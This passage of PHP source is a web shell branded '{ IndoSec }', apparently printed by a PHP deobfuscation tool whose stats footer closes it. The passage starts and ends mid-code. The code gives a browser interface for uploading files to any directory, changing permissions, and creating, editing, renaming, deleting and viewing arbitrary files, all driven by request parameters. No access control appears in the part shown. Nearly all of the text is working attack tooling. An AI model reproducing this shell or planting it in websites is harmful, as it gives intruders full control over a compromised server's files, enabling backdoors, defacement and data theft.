        $img = 'https://image.flaticon.com/icons/png/128/617/617520.png';
    } else {
        $img = 'http://icons.iconarchive.com/icons/zhoolego/material/256/Filetype-Docs-icon.png';
    }

    return $img;
}

function swall($swa, $text, $dir) {
    echo "<script>Swal.fire({
        title: '$swa',
        text: '$text',
        type: '$swa',
    }).then((value) => {window.location='?dir=$dir';})</script>";
}
function about() {
    echo '<div class="card text-center bg-light about">
        <h4 class="card-header">{ IndoSec }</h4>
        <div class="card-body">
            <center><div class="img"></div></center>
            <p class="card-text">{ IndoSec } Adalah Sebuah Komunitas Yang Berfokus Kepada Teknologi Di Indonesia, Dari Membuat Mengamankan Dan Mengexploitasi Sebuah Sistem.</p>
        </div>
        <div class="card-footer">
            <small class="card-text text-muted">Copyright 2019 { IndoSec }</small>
        </div>
    </div><br/>';
    exit;
}
function aksiUpload($dir) {
    echo '<form method="POST" enctype="multipart/form-data" name="uploader" id="uploader">
        <div class="card">
            <div class="card-body form-group">
                <p class="text-muted">//Multiple Upload</p>
                <div class="custom-file">
                    <input type="file" name="file[]" multiple class="custom-file-input" id="customFile">
                    <label class="custom-file-label" for="customFile">Choose file</label>
                </div>
                <input type="submit" class="btn btn-sm btn-primary btn-block mt-4 p-2" name="upload" value="Upload">
            </div>
        </div>
    </form>';
    if (isset($_POST['upload'])) {
        $jumlah = count($_FILES['file']['name']);
        for ($i = 0; $i < $jumlah; $i++) {
            $filename = $_FILES['file']['name'][$i];
            $up = @copy($_FILES['file']['tmp_name'][$i], "$dir/".$filename);
        }
        if ($jumlah < 2) {
            if ($up) {
                $swa = 'success';
                $text = "Berhasil Upload $filename";
                swall($swa, $text, $dir);
            } else {
                $swa = 'error';
                $text = 'Gagal Upload File';
                swall($swa, $text, $dir);
            }
        } else {
            $swa = 'success';
            $text = "Berhasil Upload $jumlah File";
            swall($swa, $text, $dir);
        }
    }
}
function chmodFile($dir, $file, $nfile) {
    echo "<form method='POST'>
        <h5>Chmod File : $nfile </h5>
        <div class='form-group input-group'>
            <input type='text' name='perm' class='form-control' value='".substr(sprintf('%o', fileperms($_GET['file'])), -4)."'>
            <input type='submit' class='btn btn-danger form-control' value='Chmod'>
        </div>
    </form>";
    if (isset($_POST['perm'])) {
        if (@chmod($_GET['file'], $_POST['perm'])) {
            echo '<font color="lime">Change Permission Berhasil</font><br/>';
        } else {
            echo '<font color="white">Change Permission Gagal</font><br/>';
        }
    }
}
function buatFile($dir, $imgfile) {
    echo "<h4>$imgfile Buat File :</h4>
    <form method='POST'>
        <div class='input-group'>
            <input type='text' class='form-control' name='nama_file[]' placeholder='Nama File...'>
            <div class='input-group-prepend'>
                <div class='input-group-text'><a id='add_input'><i class='fa fa-plus'></i></a></div>
            </div>
        </div><br/>
        <div id='output'></div>
        <textarea name='isi_file' class='form-control' rows='13' placeholder='Isi File...'></textarea><br/>
        <input type='submit' class='btn btn-info btn-block' name='bikin' value='Buat'>
    </form>";
    if (isset($_POST['bikin'])) {
        $name = $_POST['nama_file'];
        $isi_file = $_POST['isi_file'];
        foreach ($name as $nama_file) {
            $handle = @fopen("$nama_file", 'w');
            if ($isi_file) {
                $buat = @fwrite($handle, $isi_file);
            } else {
                $buat = $handle;
            }
        }
        if ($buat) {
            $swa = 'success';
            $text = 'Berhasil Membuat File';
            swall($swa, $text, $dir);
        } else {
            $swa = 'error';
            $text = 'Gagal Membuat File';
            swall($swa, $text, $dir);
        }
    }
}
function view($dir, $file, $nfile, $imgfile) {
    echo '[ <a class="active" href="?dir='.$dir.'&aksi=view&file='.$file.'">Lihat</a> ]  [ <a href="?dir='.$dir.'&aksi=edit&file='.$file.'">Edit</a> ]  [ <a href="?dir='.$dir.'&aksi=rename&file='.$file.'">Rename</a> ]  [ <a href="?dir='.$dir.'&aksi=hapusf&file='.$file.'">Delete</a> ]
    <h5>'.$imgfile.' Lihat File : '.$nfile.'</h5>';
    $is_image = @getimagesize($file);
    if (is_array($is_image)) {
        $source = base64_encode(file_get_contents($file));
        echo '<p>Type: '.$is_image['mime'].' | Size: '.$is_image['0'].' x '.$is_image['1']."</p>
        <img class='img-fluid' src='data:".$is_image['mime'].';base64,'.$source."' alt='$nfile'>";
    } else {
        echo '<textarea rows="13" class="form-control" disabled="">'.htmlspecialchars(@file_get_contents($file)).'</textarea><br/>';
    }
}
function editFile($dir, $file, $nfile, $imgfile) {
    echo '[ <a href="?dir='.$dir.'&aksi=view&file='.$file.'">Lihat</a> ]  [ <a class="active" href="?dir='.$dir.'&aksi=edit&file='.$file.'">Edit</a> ]  [ <a href="?dir='.$dir.'&aksi=rename&file='.$file.'">Rename</a> ]  [ <a href="?dir='.$dir.'&aksi=hapusf&file='.$file.'">Delete</a> ]';
    $is_image = @getimagesize($file);
    echo "<form method='POST'>
        <h5>$imgfile Edit File : $nfile</h5>";
        if (is_array($is_image)) {
            echo '<h5>Tidak dapat mengedit gambar</h5>';
        } else {
            echo "<textarea rows='13' class='form-control' name='isi'>".htmlspecialchars(@file_get_contents($file))."</textarea><br/>
            <button type='sumbit' class='btn btn-info btn-block' name='edit_file'>Update</button>";
        }
    echo '</form>';
    if (isset($_POST['edit_file'])) {
        $updt = fopen("$file", 'w');
        $hasil = fwrite($updt, $_POST['isi']);
        if ($hasil) {
            $swa = 'success';
            $text = 'Berhasil Update File';
            swall($swa, $text, $dir);
        } else {
            $swa = 'error';
            $text = 'Gagal Update File';
            swall($swa, $text, $dir);
        }
    }
}
function renameFile($dir, $file, $nfile, $imgfile) {
    echo '[ <a href="?dir='.$dir.'&aksi=view&file='.$file.'">Lihat</a> ]  [ <a href="?dir='.$dir.'&aksi=edit&file='.$file.'">Edit</a> ]  [ <a class="active" href="?dir='.$dir.'&aksi=rename&file='.$file.'">Rename</a> ]  [ <a href="?dir='.$dir.'&aksi=hapusf&file='.$file.'">Delete</a> ]';
    echo "<form method='POST'>
        <h5>$imgfile Rename File : $nfile</h5>
        <input type='text' class='form-control' name='namanew' placeholder='Masukan Nama Baru...' value='$nfile'><br/>
        <button type='sumbit' class='btn btn-info btn-block' name='rename_file'>Rename</button>
    </form>";
    if (isset($_POST['rename_file'])) {
        $lama = $file;
        $baru = $_POST['namanew'];
        rename($baru, $lama);
        if (file_exists($baru)) {
            $swa = 'success';
            $text = "Nama $baru Telah Digunakan";
            swall($swa, $text, $dir);
        } else {
            if (rename($lama, $baru)) {
                $swa = 'success';
                $text = "Berhasil Mengganti Nama Menjadi $baru";
                swall($swa, $text, $dir);
            } else {
                $swa = 'error';
                $text = 'Gagal Mengganti Nama';
                swall($swa, $text, $dir);
            }
        }
    }
}
function hapusFile($dir, $file, $nfile) {
    echo '[ <a href="?dir='.$dir.'&aksi=view&file='.$file.'">Lihat</a> ]  [ <a href="?dir='.$dir.'&aksi=edit&file='.$file.'">Edit</a> ]  [ <a href="?dir='.$dir.'&aksi=rename&file='.$file.'">Rename</a> ]  [ <a class="active" href="?dir='.$dir.'&aksi=hapusf&file='.$file.'">Delete</a> ]';
    echo "<div class='card card-body text-center text-dark mb-4'>
        <p>Yakin Menghapus : $nfile</p>
        <form method='POST'>
            <a class='btn btn-danger btn-block' href='?dir=$dir'>Tidak</a>
            <input type='submit' name='ya' class='btn btn-success btn-success btn-block' value='Ya'>
        </form>
    </div>";
    if ($_POST['ya']) {
        if (unlink($file)) {
            $swa = 'success';
            $text = 'Berhasil Menghapus File';
            swall($swa, $text, $dir);
        } else {
            $swa = 'error';
            $text = 'Gagal Menghapus File';
            swall($swa, $text, $dir);
        }
    }
}
function chmodFolder($dir, $ndir) {
    echo "<form met

Function Calls

None

Variables

None

Stats

MD5 4d391310721b5282f7469582de44348c
Eval Count 0
Decode Time 58 ms